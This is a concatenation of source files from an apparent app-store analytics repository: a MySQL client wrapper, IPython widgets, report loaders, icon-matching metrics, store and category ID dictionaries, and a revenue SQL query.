except mysql.connector.Error as err:
if not self.connector.unread_result:
self.connector.rollback()
raise
def create_connection(self):
"""
Creates a cursor to the database.
"""
if self.db == '':
self.connector = mysql.connector.connect(user=self.user,
                                                     password=self.password,
host=self.host,
port=self.port)
else:
self.connector = mysql.connector.connect(user=self.user,
                                                     password=self.password,
host=self.host,
port=self.port, db=self.db)
self.cursor = self.connector.cursor()
def destroy_connection(self):
""""
Closes the connection.
"""
if self.cursor is not None:
self.cursor.close()
if self.connector is not None:
self.connector.close()
def execute(self, sql_statement, store_output=True,
print_statement=True):
"""
Executes a SQL statement.
"""
query_result = self.__cursor_execute_and_commit(sql_statement)
if query_result is not None:
if print_statement:
print("Statement had {} row(s) as result".format(len(query_result)))
columns_names = zip(*self.cursor.description)[0]
if not query_result:
result = DataFrame(columns=columns_names)
else:
result = DataFrame(query_result, columns=columns_names)
else:
result = query_result
if store_output:
return result
def execute_multi(self, sql_statement, store_output=True,
print_statements=True):
"""
Executes multiple SQL results.
"""
results = self.__cursor_execute_and_commit(sql_statement, multi=True)
result_array = []
if results is not None:
for result in results:
if result.with_rows:
query_result = result.fetchall()
if print_statements:
print("Statement '%s' had %i row(s) as result \n" %
(result.statement, len(query_result)))
columns_names = zip(*result.description)[0]
result_array.append(DataFrame(query_result,
columns=columns_names))
else:
if print_statements:
print("Statement '%s' affected %i row(s) \n" %
(result.statement, result.rowcount))
if store_output:
return result_array
def execute_files(self, sql_file_path, store_output=True,
print_statements=True):
"""
Executes SQL files given by glob pattern.
"""
files = glob.glob(sql_file_path)
# natural order sorting
files = natsort(files)
if len(files) == 0:
print("\nNo files found!\n")
return None
result_array = []
for current_file in files:
sql_file = open(current_file, 'r')
sql_text = sql_file.read()
# Remove single line comments and non greedy filter out block
# comments.
line_comment_filter = re.compile("--.*")
block_comment_filter = re.compile("\/\*.*?\*\/", re.DOTALL)
sql_text = block_comment_filter.sub('', sql_text)
sql_text = line_comment_filter.sub('', sql_text)
search_set_delim = re.search('(delimiter\s*)(\S+)\s*', sql_text,
re.IGNORECASE)
if search_set_delim:
new_delim = re.escape(search_set_delim.group(2))
set_delim = search_set_delim.group(1) + new_delim + ".*"
set_delimiter_filter = re.compile(set_delim, re.IGNORECASE)
sql_text = set_delimiter_filter.sub('', sql_text)
new_delim_filter = re.compile(new_delim)
sql_text = new_delim_filter.sub(';', sql_text)
default_delim_filter = re.compile("delimiter\s*;\s*")
sql_text = default_delim_filter.sub('', sql_text)
# Two step filtering out empty sql statements
sql_text = re.sub('(;\\s*;)', ';', sql_text)
sql_text = re.sub('(;\\s*;)', ';', sql_text)
results = self.__cursor_execute_and_commit(sql_text, multi=True)
if print_statements:
print("Executing: '{}'\n".format(current_file))
if results is not None:
for result in results:
if result.with_rows:
query_result = result.fetchall()
if print_statements:
print("Statement '%s' had %i row(s) as result \n" %
(result.statement, len(query_result)))
if store_output:
columns_names = zip(*result.description)[0]
if len(query_result) < 1:
query_result = np.empty((1, len(columns_names)))
query_result[:] = np.nan
result_array.append(DataFrame(query_result,
columns=columns_names))
else:
if print_statements:
print("Statement '%s' affected %i row(s) \n" %
(result.statement, result.rowcount))
if store_output:
return result_array
def execute_file_list(self, sql_file_list, store_output=True,
print_statements=True):
"""
Executes a list of SQL files.
"""
result_array = []
for sql_file in sql_file_list:
result_array.append(self.execute_files(sql_file, store_output,
print_statements))
if store_output:
return result_array
def set_variables(self, variable_dictionary):
"""
Sets multiple variables in the current session.
Example:
db.set_variables({'start_date': '20131201', 'iso_code': 'NL'})
--> @start_date = '20131201';
--> @iso_code = 'NL';
"""
statements = ''
for name in variable_dictionary:
statements += "set @{} = '{}';".format(name, variable_dictionary[name])
if statements:
self.execute_multi(statements, store_output=False, print_statements=False)
else:
print "Variable dictionary was empty; no variables were set"
def get_tables(self, table_names, print_statements=True):
"""
Returns the contents of tables in a dictionary.
Params:
@table_names: List with names of tables to retrieve (use the
absolute path).
"""
result = {}
for table in table_names:
sql_statement = "select * from {};".format(table)
result[table] = self.execute(sql_statement,
print_statement=print_statements)
return result
def use_database(self, database, print_statement=True):
"""
Sets database to use.
Params:
- @database: Database name (e.g. 'appstore' or 'market').
"""
sql_statement = "use {};".format(database)
self.execute(sql_statement, print_statement=print_statement)
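
# Minimal usage sketch (connection settings below are placeholders; see
# example_settings.ini for the expected settings.ini format):
#
# client = Client(host='localhost', user='me', password='secret',
#                 port=3306, db='appstore')
# df = client.execute('select 1 as one;')
# client.set_variables({'start_date': '20131201', 'iso_code': 'NL'})
# tables = client.get_tables(['appstore.countries'])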
<file_sep>/financial-product-benchmark/single-model/lib/my_classes.py
from IPython.html import widgets
from IPython.display import display, clear_output
from collections import OrderedDict
class FunctionController(object):
def __init__(self, data, sel_cols, func, **func_kwargs):
self.data = data
self.sel_cols = sel_cols
self.func = func
self.func_kwargs = func_kwargs
self.sel = None
self.sel_data = None
self.updating_all_lists = False
self.container = widgets.ContainerWidget()
self.create_dropdowns()
self.change_handler()
def _ipython_display_(self):
"""
Called when display() or pyout is used to display the GUI.
"""
self.container._ipython_display_()
def create_dropdowns(self):
children = []
for column in self.sel_cols:
dropdown = Dropdown()
dropdown.on_trait_change(self.change_handler, 'value')
children.append(dropdown)
self.container.children = children
self.container._css = {'': {'width': '100%', 'flex-direction': 'row',
'justify-content': 'center', 'align-items': 'center',
'margin-bottom': '5px'},
'.widget-hbox-single': {'margin': '5px'}}
def change_handler(self, name='', old='', new=''):
if not self.updating_all_lists:
self.updating_all_lists = True
self.populate_dropdowns()
self.execute_function()
self.updating_all_lists = False
def populate_dropdowns(self):
data_sel = self.data[self.sel_cols[0]] == self.data[self.sel_cols[0]]
for i, column in enumerate(self.sel_cols):
unique_data_str = self.data.ix[data_sel, column].unique().astype(str)
unique_data = self.data.ix[data_sel, column].unique()
self.container.children[i].values = OrderedDict(zip(unique_data_str, unique_data))
data_sel &= (self.data.ix[data_sel, column] == self.container.children[i].value)
self.sel = data_sel
def execute_function(self):
self.sel_data = self.data[self.sel]
self.func(self, self.sel_data, self.sel_cols, **self.func_kwargs)
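
# Minimal usage sketch (toy data and callback are assumptions). The callback
# receives the controller, the rows matching the current dropdown selection,
# and the selection columns:
#
# import pandas as pd
#
# def show_selection(controller, sel_data, sel_cols):
#     clear_output(wait=True)
#     print sel_data
#
# df = pd.DataFrame({'store': ['US', 'US', 'JP'], 'feed': [0, 1, 0]})
# FunctionController(df, ['store', 'feed'], show_selection)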
class Dropdown(widgets.DropdownWidget):
"""
DropDown custom widget
"""
def __init__(self, **kwargs):
super(Dropdown, self).__init__(**kwargs)
self._css = {'.btn-group>.btn:first-child': {'width': '100px'},
'.dropdown-menu': {'max-height': '140px', 'width': '115px',
'overflow-y': 'scroll',
'overflow-x': 'hidden'}}<file_sep>/top-app-stability/README.md
top-app-stability
=================
This directory contains the investigation into the stability of top app estimates, comparing App Annie's estimates with those of Distimo. This investigation was performed to gain more insight into the best method for restructuring/improving App Annie's estimation algorithm by reusing parts of Distimo's algorithm.
This analysis is performed on estimates in the period 2014-03-01 till 2014-10-01.<file_sep>/product_quality/load_reports.py
'''
Created on Apr 16, 2013
@author: perezrafael
'''
import pandas as pd
import sys
import os
import zipfile
import StringIO
import commands
import calendar
from internal import utilities_pandas
from internal import config
from internal import utilities
def _check_args():
if len(sys.argv) - 1 != 5:
raise Exception("Wrong number of arguments.")
input_dir = sys.argv[1]
if not (os.path.exists(input_dir)):
raise Exception("Please make sure that both input dir exists")
def _fetch_from_reports(input_dir, month, country_id, platform):
for file in os.listdir(input_dir):
if file.endswith("%s_%s.zip"%(platform, month)):
fullpath = os.path.join(input_dir, file)
country_name = ''
if platform =='ios':
platform = 'iOS'
#country_names = [ config.IOS_STORES_DICT[k].replace(' ', '_') for k in country_ids ]
country_name = config.IOS_STORES_DICT[country_id].replace(' ', '_')
elif platform =='android':
platform = 'Android'
#country_names = [ config.ANDROID_STORES_DICT[k].replace(' ', '_') for k in country_ids ]
country_name = config.ANDROID_STORES_DICT[country_id].replace(' ', '_')
filehandle = open(fullpath, 'rb')
zfile = zipfile.ZipFile(filehandle)
for file in zfile.namelist():
if 'App_Annie_Intelligence_Top_Apps_Report_%s_%s_'%(platform, month) in file and '.csv' in file and country_name in file:
data = StringIO.StringIO(zfile.read(file))
df = pd.read_csv(data)
break
df.rename(columns={'Rank':'rank',
'Category':'category_id',
'App ID':'app_id',
'App Estimate':'estimate',
'Country':'store_id',
'Unit':'unit',
'Period':'period'}, inplace=True)
return df
def _calculate_sbe(df):
df = df[['app_id', 'Market', 'Type', 'estimate']]
sbe = df.groupby(['app_id', 'Market', 'Type']).mean().reset_index()
sbe = sbe.groupby(['app_id']).sum().reset_index()
sbe.rename(columns={'estimate':'sbe'}, inplace=True)
return sbe
def _fetch_from_db(platform, store, unit, dtstart, dtend, db_info):
if platform =='ios':
table = 'aa_staging'
column = 'app_id'
elif platform == 'android':
table = 'aa_staging_android'
column = 'app_class'
common_suffix = 'WHERE d.store_id=%s ' % store + \
'AND d.date >= DATE(\'%s\') ' % dtstart + \
'AND d.date <= DATE(\'%s\'))' % dtend
if unit == 'Downloads':
cmd = 'echo "COPY (SELECT date, ' + column + ', units FROM downloads d ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U aa -h nile ' + table
elif unit == 'USD':
cmd = 'echo "COPY (SELECT date, ' + column + ', revenue FROM sales d ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U aa -h nile ' + table
else:
raise Exception('Unit types should be Downloads or USD')
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching daily estimation: %s" % cmd)
return utilities_pandas.convert_str_to_df(stdout)
def _get_full_period_app_actuals (df):
size = df.groupby('app_id').size().reset_index()
max = size[0].max()
size = size[size[0]==max][['app_id']]
return size
def get_monthly_values(input_dir, month, country_id, platform, unit, filter):
report = _fetch_from_reports(input_dir, month, country_id, platform)
report = report[report['unit']==unit]
sbe = _calculate_sbe(report)
dtstart = '%s-01'%month
dtend = '%s-%s'%(month,calendar.monthrange(int(month.split('-')[0]),int(month.split('-')[1]))[1])
actuals = utilities._fetch_from_db(platform, country_id, unit, dtstart, dtend)
if platform == 'android':
actuals.rename(columns={'app_class':'app_id'}, inplace=True)
if filter:
full_period_apps = _get_full_period_app_actuals(actuals)
actuals = actuals.merge(full_period_apps, on='app_id', how='inner')
if unit =='USD':
actuals.rename(columns={'revenue':'units'}, inplace=True)
actuals = actuals[['app_id', 'units']].groupby('app_id').sum().reset_index()
sbe = sbe.merge(actuals, on='app_id', how='inner')
return sbe
def main():
_check_args()
input_dir = sys.argv[1]
month = sys.argv[2]
platform = sys.argv[3]
unit = sys.argv[4]
filter = sys.argv[5]
if filter == 'filter':
filter = True
out_dir = './data/filtered_full-period_monthly'
else:
filter = False
out_dir = './data/original_monthly'
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if platform =='ios':
country_ids = [143441,143465,143466,143462,143444]
else:
country_ids =[10,7,9,27,3]
first_pass = True
for country_id in country_ids:
if first_pass:
try:
result = get_monthly_values(input_dir, month, country_id, platform, unit, filter)
result['store_id'] = country_id
first_pass=False
except:
first_pass=True
else:
try:
rb = get_monthly_values(input_dir, month, country_id, platform, unit, filter)
rb['store_id'] = country_id
result = pd.concat([result,rb])
except:
pass
result.to_csv('%s/Monthly_%s_%s_%s.csv'%(out_dir,month, platform, unit), index=False)
if __name__ == '__main__':
main()
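
# Invocation sketch (path and month below are placeholders):
#   python load_reports.py /path/to/reports 2013-04 ios Downloads filter
# Arguments: input_dir, month (YYYY-MM), platform (ios|android),
# unit (Downloads|USD) and filter ('filter' keeps only apps with actuals for
# the full period; any other value disables filtering).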
<file_sep>/exact-matching-improvement/icon_lib/compute_metrics.py
__author__ = 'srhmtonk'
import pandas as pd
import numpy as np
from os import urandom
import Levenshtein as Le
import sklearn.metrics as me
import matplotlib.pylab as plt
COLS = {
'colors': [['avg_r_1', 'avg_b_1', 'avg_g_1'], ['avg_r_2', 'avg_b_2', 'avg_g_2']],
'color_distance': 'color_distance',
'hashes': ['hash_1', 'hash_2'],
'hamming': 'hamming',
'label': 'label',
'result': 'result'
}
def rand_hex_string(n_bytes):
"""
Generate random hexadecimal string of length n_bytes.
:param n_bytes: length of hexadecimal string in bytes
:return: hexadecimal string
"""
return urandom(n_bytes).encode('hex')
def create_rand_df(n_rows=10):
"""
Generate DataFrame with random two hashes and labels.
:param n_rows: length of DataFrame
:return: DataFrame
"""
df = pd.DataFrame(np.arange(n_rows), columns=['index'])
df['hash_1'] = df['index'].apply(lambda x: rand_hex_string(16))
df['hash_2'] = df['index'].apply(lambda x: rand_hex_string(16))
df['label'] = np.random.randint(0, 2, size=len(df))
return df.set_index('index')
def compute_hamming_distance(hex_str_1, hex_str_2):
"""
Compute Hamming distance between two hexadecimal strings.
:param hex_str_1: hexadecimal string
:param hex_str_2: hexadecimal string
:return: hamming distance
"""
    # The 'f' prefix preserves leading zeros, so both binary representations
    # have equal length, which Levenshtein's hamming() requires.
    return Le.hamming(bin(int('f'+hex_str_1, 16)), bin(int('f'+hex_str_2, 16)))
def update_df_hamming(df, cols=COLS):
"""
Update df with column containing the computed Hamming distance between the two hash columns.
:param df: DataFrame with two hash columns
:param cols: df column names
:return: updated df with Hamming column
"""
df[cols['hamming']] = df[cols['hashes']].apply(lambda x: compute_hamming_distance(x[cols['hashes'][0]],
x[cols['hashes'][1]]),
axis=1)
return df
def compute_euclidean_color_distance(colors_1, colors_2):
"""
    Compute Euclidean distance between the rows of two numpy matrices.
:param colors_1: numpy matrix (size m x n)
:param colors_2: numpy matrix (size m x n)
:return: numpy matrix with Euclidean distance (size m x 1)
"""
return np.sqrt(np.sum((colors_1.astype(float) - colors_2.astype(float))**2, axis=1))
def update_df_color_distance(df, cols=COLS):
"""
    Update df with a column containing the Euclidean distance between the two
    sets of color columns.
    :param df: DataFrame with two (x len(colors[ii])) color columns
    :param cols: df column names
    :return: updated df with Euclidean distance column
"""
difference = df[cols['colors'][0]].values - df[cols['colors'][1]].values
df[cols['color_distance']] = np.sqrt(np.sum(difference.astype(float) ** 2, axis=1))
return df
def show_hamming_statistics(df, cols=COLS):
"""
Show Hamming distance statistic.
:param df: DataFrame with hamming distance column
:param cols: df column names
"""
df[COLS['hamming']].hist(bins=50)
print 'distance statistics'
print '\tmean:\t'+str(df[cols['hamming']].mean())
print '\tstd:\t'+str(df[cols['hamming']].std())
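
# Minimal end-to-end sketch on synthetic data (random hashes and labels, so
# the resulting scores are meaningless; this only shows the call order, using
# compute_optimal_threshold() defined below):
#
# df = create_rand_df(n_rows=1000)
# df = update_df_hamming(df)
# df, results = compute_optimal_threshold(df, beta=1)
# print results['threshold'], results['F_score'], results['AUC']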
def compute_f_score(precision, recall, beta=1):
"""
Compute F-score for given beta.
:param precision: precision of classifier
:param recall: recall of classifier
:return: F-score for given beta, precision and recall
"""
return (1+beta**2)*precision*recall/(beta**2*precision+recall)
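
# Worked example: precision 0.8 and recall 0.5 give
#   F1 = 2 * 0.8 * 0.5 / (0.8 + 0.5) ~ 0.615
#   F2 = 5 * 0.8 * 0.5 / (4 * 0.8 + 0.5) ~ 0.541 (beta=2 weights recall higher)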
def compute_optimal_threshold(df, beta=1, ROC_curve=False, curve_data=False, plot_name='', cols=COLS, metric='hamming'):
"""
    Compute the threshold on the distance metric that maximizes the F-score
    and add the resulting classification to df.
    :param df: DataFrame with labels and hamming distance
:param beta: F-score parameter beta
:param ROC_curve: plotting ROC curve
:param curve_data: include curve data in result
:param cols: df column names
:param metric: Metric to compute threshold for (should correspond to the metric column in cols)
:return: results and updated df
"""
# we count below threshold as positive therefore we use -df.hamming
fpr, tpr, roc_threshold = me.roc_curve(df[cols['label']].values, -df[cols[metric]])
precision, recall, thresholds = me.precision_recall_curve(df[cols['label']].values, -df[cols[metric]])
precision, recall = precision[:-1], recall[:-1] # drop last values, they do not correspond with a threshold
# compute the F scores for the different precision and recall values
f_scores = compute_f_score(precision, recall, beta=beta)
f_max_idx = np.nanargmax(f_scores)
results = {
'threshold': -thresholds[f_max_idx],
'F_score': f_scores[f_max_idx],
'beta': beta,
'PPV': precision[f_max_idx],
'TPR': recall[f_max_idx],
'AUC': me.auc(fpr, tpr)
}
if curve_data:
results['Curve_fpr'] = fpr
results['Curve_tpr'] = tpr
# update data frame with classification results column
    df[cols['result']] = (df[cols[metric]] <= results['threshold'])*1
# plot the ROC curve and add point corresponding to optimal threshold
plt.ioff()
if ROC_curve or plot_name != '':
fig = plt.figure()
plt.plot(fpr, tpr, label='ROC curve (AUC = %0.2f)' % results['AUC'])
roc_idx = np.where(roc_threshold==-results['threshold'])[0][0]
plt.plot(fpr[roc_idx], tpr[roc_idx], 'ro', label='threshold = %0.2f'%results['threshold'])
plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve')
plt.legend(loc="lower right")
if ROC_curve:
fig.show()
if plot_name != '':
plt.savefig(plot_name, format='png')
plt.close(fig)
return df, results<file_sep>/evaluation/py/config.py
'''
Created on Apr 16, 2013
@author: perezrafael
'''
config_ios = {
## It's recommended to symlink the file here.
'unit_feeds': {'Downloads': [0, 1, 100, 101],
'USD': [2, 102]},
'db_info': {'host': '192.168.8.54',
'db_name': 'ios_dwh',
'username': 'aa'}
}
config_android = {
'script_path': '../external/est_android.py'
}
IOS_MARKETS_DICT = { 0:'iPhone',
1:'iPhone',
2:'iPhone',
100:'iPad',
101:'iPad',
102:'iPad'
}
IOS_TYPES_DICT = { 0:'Free',
1:'Paid',
2:'Grossing',
100:'Paid',
101:'Free',
102:'Grossing'
}
IOS_US_STORE_ID = 143441
IOS_WW_STORE_ID = 0
IOS_ROW_STORE_ID = 1
IOS_MSFT_STORE_ID = 2
IOS_WESTERN_EU_STORE_ID = 3
IOS_APAC_STORE_ID = 4
IOS_NORTH_AMERICA_STORE_ID = 5
IOS_SOUTH_EAST_ASIA_STORE_ID = 6
IOS_STORES_DICT = {143441: u'United States',
143442: u'France',
143443: u'Germany',
143444: u'United Kingdom',
143445: u'Austria',
143446: u'Belgium',
143447: u'Finland',
143448: u'Greece',
143449: u'Ireland',
143450: u'Italy',
143451: u'Luxembourg',
143452: u'Netherlands',
143453: u'Portugal',
143454: u'Spain',
143455: u'Canada',
143456: u'Sweden',
143457: u'Norway',
143458: u'Denmark',
143459: u'Switzerland',
143460: u'Australia',
143461: u'New Zealand',
143462: u'Japan',
143463: u'Hong Kong',
143464: u'Singapore',
143465: u'China',
143466: u'South Korea',
143467: u'India',
143468: u'Mexico',
143469: u'Russia',
143470: u'Taiwan',
143471: u'Vietnam',
143472: u'South Africa',
143473: u'Malaysia',
143474: u'Philippines',
143475: u'Thailand',
143476: u'Indonesia',
143477: u'Pakistan',
143478: u'Poland',
143479: u'Saudi Arabia',
143480: u'Turkey',
143481: u'United Arab Emirates',
143482: u'Hungary',
143483: u'Chile',
143485: u'Panama',
143486: u'Sri Lanka',
143487: u'Romania',
143489: u'Czech Republic',
143491: u'Israel',
143493: u'Kuwait',
143494: u'Croatia',
143495: u'Costa Rica',
143496: u'Slovakia',
143497: u'Lebanon',
143498: u'Qatar',
143499: u'Slovenia',
143501: u'Colombia',
143502: u'Venezuela',
143503: u'Brazil',
143504: u'Guatemala',
143505: u'Argentina',
143506: u'El Salvador',
143507: u'Peru',
143508: u'Dominican Republic',
143509: u'Ecuador',
143510: u'Honduras',
143511: u'Jamaica',
143512: u'Nicaragua',
143513: u'Paraguay',
143514: u'Uruguay',
143515: u'Macau',
143516: u'Egypt',
143517: u'Kazakhstan',
143518: u'Estonia',
143519: u'Latvia',
143520: u'Lithuania',
143521: u'Malta',
143523: u'Moldova',
143524: u'Armenia',
143525: u'Botswana',
143526: u'Bulgaria',
143528: u'Jordan',
143529: u'Kenya',
143530: u'Macedonia',
143531: u'Madagascar',
143532: u'Mali',
143533: u'Mauritius',
143534: u'Niger',
143535: u'Senegal',
143536: u'Tunisia',
143537: u'Uganda',
143538: u'Anguilla',
143539: u'Bahamas',
143540: u'Antigua and Barbuda',
143541: u'Barbados',
143542: u'Bermuda',
143543: u'British Virgin Islands',
143544: u'Cayman Islands',
143545: u'Dominica',
143546: u'Grenada',
143547: u'Montserrat',
143548: u'St. Kitts and Nevis',
143549: u'St. Lucia',
143550: u'St. Vincent and The Grenadines',
143551: u'Trinidad and Tobago',
143552: u'Turks and Caicos',
143553: u'Guyana',
143554: u'Suriname',
143555: u'Belize',
143556: u'Bolivia',
143557: u'Cyprus',
143558: u'Iceland',
143559: u'Bahrain',
143560: u'Brunei',
143561: u'Nigeria',
143562: u'Oman',
143563: u'Algeria',
143564: u'Angola',
143565: u'Belarus',
143566: u'Uzbekistan',
143568: u'Azerbaijan',
143571: u'Yemen',
143572: u'Tanzania',
143573: u'Ghana',
143575: u'Albania',
143576: u'Benin',
143577: u'Bhutan',
143578: u'Burkina Faso',
143579: u'Cambodia',
143580: u'Cape Verde',
143581: u'Chad',
143582: u'Congo',
143583: u'Fiji',
143584: u'Gambia',
143585: u'Guinea-Bissau',
143586: u'Kyrgyzstan',
143587: u'Laos',
143588: u'Liberia',
143589: u'Malawi',
143590: u'Mauritania',
143591: u'Micronesia',
143592: u'Mongolia',
143593: u'Mozambique',
143594: u'Namibia',
143484: u'Nepal',
143595: u'Palau',
143597: u'Papua New Guinea',
143598: u'Sao Tome and Principe',
143599: u'Seychelles',
143600: u'Sierra Leone',
143601: u'Solomon Islands',
143602: u'Swaziland',
143603: u'Tajikistan',
143604: u'Turkmenistan',
143492: u'Ukraine',
143605: u'Zimbabwe'}
#IOS_STORES_DICT_REVERSE = {y:x for x,y in IOS_STORES_DICT.iteritems()}
IOS_CATEGORIES_DICT = {36: u'Overall',
6000: u'Business',
6001: u'Weather',
6002: u'Utilities',
6003: u'Travel',
6004: u'Sports',
6005: u'Social Networking',
6006: u'Reference',
6007: u'Productivity',
6008: u'Photo and Video',
6009: u'News',
6010: u'Navigation',
6011: u'Music',
6012: u'Lifestyle',
6013: u'Health and Fitness',
6014: u'Games',
6015: u'Finance',
6016: u'Entertainment',
6017: u'Education',
6018: u'Books',
6020: u'Medical',
6021: u'Newsstand',
6022: u'Catalogs',
6023: u'Food and Drink',
7001: u'Action',
7002: u'Adventure',
7003: u'Arcade',
7004: u'Board',
7005: u'Card',
7006: u'Casino',
7007: u'Dice',
7008: u'Educational',
7009: u'Family',
7010: u'Kids',
7011: u'Music',
7012: u'Puzzle',
7013: u'Racing',
7014: u'Role Playing',
7015: u'Simulation',
7016: u'Sports',
7017: u'Strategy',
7018: u'Trivia',
7019: u'Word'}
#IOS_CATEGORIES_DICT_REVERSE = {y:x for x,y in IOS_CATEGORIES_DICT.iteritems()}
IOS_FEEDS_DICT = {
0: "IPHONE_FREE",
1: "IPHONE_PAID",
2: "IPHONE_GROSSING",
100: "IPAD_PAID",
101: "IPAD_FREE",
102: "IPAD_GROSSING"
}
#IOS_FEEDS_DICT_REVERSE = {y:x for x,y in IOS_FEEDS_DICT.iteritems()}
ANDROID_US_STORE_ID = 10
ANDROID_WW_STORE_ID = 1000
ANDROID_ROW_STORE_ID = 1001
ANDROID_MSFT_STORE_ID = 1002
ANDROID_WESTERN_EU_STORE_ID = 1003
ANDROID_APAC_STORE_ID = 1004
ANDROID_NORTH_AMERICA_STORE_ID = 1005
ANDROID_SOUTH_EAST_ASIA_STORE_ID = 1006
ANDROID_STORES_DICT = {ANDROID_WW_STORE_ID: u'ALL', # world wide
ANDROID_ROW_STORE_ID: u'ROW', # Rest of world other than US
ANDROID_MSFT_STORE_ID: u'ALL MSFT', # MSFT all stores, Now it's the same as ALL
ANDROID_WESTERN_EU_STORE_ID: u'Western Europe',
ANDROID_APAC_STORE_ID: u'APAC',
ANDROID_NORTH_AMERICA_STORE_ID: u'North America',
ANDROID_SOUTH_EAST_ASIA_STORE_ID: u'South East Asia',
1: u'Australia',
2: u'Canada',
3: u'China',
4: u'Germany',
5: u'Spain',
6: u'France',
7: u'United Kingdom',
8: u'Italy',
9: u'Japan',
10: u'United States',
11: u'Belgium',
12: u'Switzerland',
13: u'Chile',
14: u'South Africa',
15: u'Vietnam',
16: u'Hong Kong',
17: u'Argentina',
18: u'Brazil',
19: u'India',
20: u'Finland',
21: u'Indonesia',
22: u'Russia',
23: u'Netherlands',
24: u'Malaysia',
25: u'Turkey',
26: u'Mexico',
27: u'South Korea',
28: u'Poland',
29: u'Thailand',
30: u'Taiwan',
31: u'Philippines',
32: u'Singapore',
33: u'Egypt',
34: u'Sweden',
35: u'Austria',
36: u'Czech Republic',
37: u'Hungary',
38: u'Denmark',
39: u'Ireland',
40: u'Israel',
41: u'New Zealand',
42: u'Norway',
43: u'Portugal',
44: u'Romania'}
#ANDROID_STORES_DICT_REVERSE = {y:x for x,y in ANDROID_STORES_DICT.iteritems()}
ANDROID_STORE_SHORTCUTS_TO_ID_DICT = {'AU':1,
'CA':2,
'CN':3,
'DE':4,
'ES':5,
'FR':6,
'GB':7,
'IT':8,
'JP':9,
'US':10,
'BE':11,
'CH':12,
'CL':13,
'ZA':14,
'VN':15,
'HK':16,
'AR':17,
'BR':18,
'IN':19,
'FI':20,
'ID':21,
'RU':22,
'NL':23,
'MY':24,
'TR':25,
'MX':26,
'KR':27,
'PL':28,
'TH':29,
'TW':30,
'PH':31,
'SG':32,
'EG':33,
'SE':34,
'AT':35,
'CZ':36,
'HU':37,
'DK':38,
'IE':39,
'IL':40,
'NZ':41,
'NO':42,
'PT':43,
'RO':44,
'SK':45,
'GR':46,
'BG':47,
'UA':48,
'AE':49,
'KW':50,
#'SA':51, # Disabled because of poor data points.
}
ANDROID_CATEGORIES_DICT = {1: u'OVERALL',
2: u'GAME',
3: u'ARCADE',
4: u'BRAIN',
5: u'CARDS',
6: u'CASUAL',
7: u'GAME_WALLPAPER',
8: u'RACING',
9: u'SPORTS_GAMES',
10: u'GAME_WIDGETS',
11: u'APPLICATION',
12: u'BOOKS_AND_REFERENCE',
13: u'BUSINESS',
14: u'COMICS',
15: u'COMMUNICATION',
16: u'EDUCATION',
17: u'ENTERTAINMENT',
18: u'FINANCE',
19: u'HEALTH_AND_FITNESS',
20: u'LIBRARIES_AND_DEMO',
21: u'LIFESTYLE',
22: u'APP_WALLPAPER',
23: u'MEDIA_AND_VIDEO',
24: u'MEDICAL',
25: u'MUSIC_AND_AUDIO',
26: u'NEWS_AND_MAGAZINES',
27: u'PERSONALIZATION',
28: u'PHOTOGRAPHY',
29: u'PRODUCTIVITY',
30: u'SHOPPING',
31: u'SOCIAL',
32: u'SPORTS',
33: u'TOOLS',
34: u'TRANSPORTATION',
35: u'TRAVEL_AND_LOCAL',
36: u'WEATHER',
37: u'APP_WIDGETS'}
#ANDROID_CATEGORIES_DICT_REVERSE = {y:x for x,y in ANDROID_CATEGORIES_DICT.iteritems()}
ANDROID_FEEDS_DICT = {
0: 'ANDROID_FREE',
1: 'ANDROID_PAID',
2: 'ANDROID_GROSSING',
}
#ANDROID_FEEDS_DICT_REVERSE = {y:x for x,y in ANDROID_FEEDS_DICT.iteritems()}
<file_sep>/financial-product-benchmark/combined-sample_size/Retrieve_q2_gross.sql
set @country = 'JP';
DROP TEMPORARY TABLE IF EXISTS temp.top_100;
CREATE TEMPORARY TABLE temp.top_100
AS
SELECT
cn.iso_code,
a.external_id,
a.name,
a.publisher,
e.application_id,
e.appstore_instance_id,
sum(e.revenue) as revenue
FROM
estimates_dev.estimates_quarter_appstore e
JOIN appstore.appstore_instances ai ON ai.id = e.appstore_instance_id
JOIN appstore.countries cn ON cn.id = ai.country_id
JOIN appstore.applications a ON a.id = e.application_id
WHERE
e.date = 20140401 AND cn.iso_code in (@country) AND ai.device_id in (1,2)
GROUP BY
cn.iso_code, e.application_id
ORDER BY
iso_code, revenue DESC
LIMIT 100
;
DROP TEMPORARY TABLE IF EXISTS temp.date_select;
CREATE TEMPORARY TABLE temp.date_select
(PRIMARY KEY(date))
select
distinct r.date
from
appstore.rankings r
WHERE
(r.date < 20140701 AND r.date>=20140401)
;
DROP TEMPORARY TABLE IF EXISTS temp.all_select;
CREATE TEMPORARY TABLE temp.all_select
(PRIMARY KEY(date, appstore_instance_id,application_id, type ))
select
distinct r.date,
t.appstore_instance_id,
t.application_id,
'gross' as type,
t.revenue,
t.iso_code,
t.name,
t.publisher
from
temp.date_select r
join temp.top_100 t
;
select
a.name,
a.publisher,
a.revenue,
d.application_id,
d.appstore_instance_id,
MAX(d.monitor_app),
d.type
from
estimates.application_data_appstore d
join temp.all_select a
on a.date = d.date and a.appstore_instance_id = d.appstore_instance_id and a.application_id = d.application_id and a.type = d.type
group by
application_id
order by
revenue desc
<file_sep>/financial-product-benchmark/single-model/lib/my_functions.py
import glob
import pandas as pd
overall_category = 36
feed_dict = {'IPHONE_FREE':'iphone_free', 'IPAD_FREE':'ipad_free',
'IPHONE_PAID':'iphone_paid', 'IPAD_PAID':'ipad_paid',
'IPHONE_GROSSING':'iphone_revenue', 'IPAD_GROSSING':'ipad_revenue'}
def parse_debug_files_ios(input_path, include_custom_added=False):
files = glob.glob(input_path)
data = None
for file in files:
print 'parsing '+file+'...'
debug_data = pd.read_csv(file)
if include_custom_added:
sel = ((debug_data.Rank==1)&(debug_data.Customize.astype(str)=='A')&(debug_data.Category==overall_category))\
|((debug_data.Customize.astype(str)!='A')&(~debug_data['App ID'].isnull()))
else:
sel = ((debug_data.Customize.astype(str)!='A')&(~debug_data['App ID'].isnull()))
debug_data = debug_data[sel]
debug_data = debug_data[['Store','Feed','End Date','Day','App ID','Value','Customize']]
